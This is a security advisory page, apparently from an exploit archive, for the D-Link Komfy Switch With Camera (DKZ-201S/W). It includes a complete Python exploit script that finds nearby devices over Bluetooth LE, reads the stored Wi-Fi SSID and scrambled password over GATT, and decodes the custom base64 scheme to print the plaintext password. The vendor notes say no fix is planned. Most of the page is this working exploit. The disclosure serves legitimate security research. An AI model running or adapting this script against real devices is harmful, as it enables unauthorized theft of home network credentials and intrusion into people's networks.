Komfy Switch With Camera DKZ-201S/W Password Disclosure

2016.10.27
Credit: Jason Doyle
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE # Date: Oct 13, 2016 # Exploit Author: Jason Doyle @_jasondoyle # Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/ # HW Model: DKZ-201S/W # SW Version: 1.0 # Tested on: Ubuntu 16.04 LTS / Python 2.7 # Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link # 10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned. # Vulnerability Summary #It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE). # Vulnerability Details #https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure # Author: Jason Doyle @_jasondoyle # Komfy Switch with Camera wifi password disclosure exploit script import re, base64 from bluepy.btle import Scanner from gattlib import GATTRequester #lookup table to unscramble base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding scanner = Scanner() devices = scanner.scan(5.0) bAddr = "" for dev in devices: if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9): bAddr = dev.addr print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi) if not bAddr: print "No Komfy switches found" sys.exit(1) req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0') req.connect(True, 'public', 'none', 0, 78) #request SSID wifiSsid = req.read_by_uuid("0xb006")[0] reg = re.search(r"(:\s\"(.*)\")", wifiSsid) wifiSsid = reg.groups()[1].replace("\\","") #request komfy encoded wifi password wifiPassKomfy64 = req.read_by_uuid("0xb007")[0] reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64) wifiPassKomfy64 = reg.groups()[1].replace("\\","") #convert password to real base64 wifiPassBase64 = "" for char in wifiPassKomfy64: i = komfy64Alphabet.index(char) wifiPassBase64 += base64Alphabet[i] wifiPass = base64.b64decode(wifiPassBase64) print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top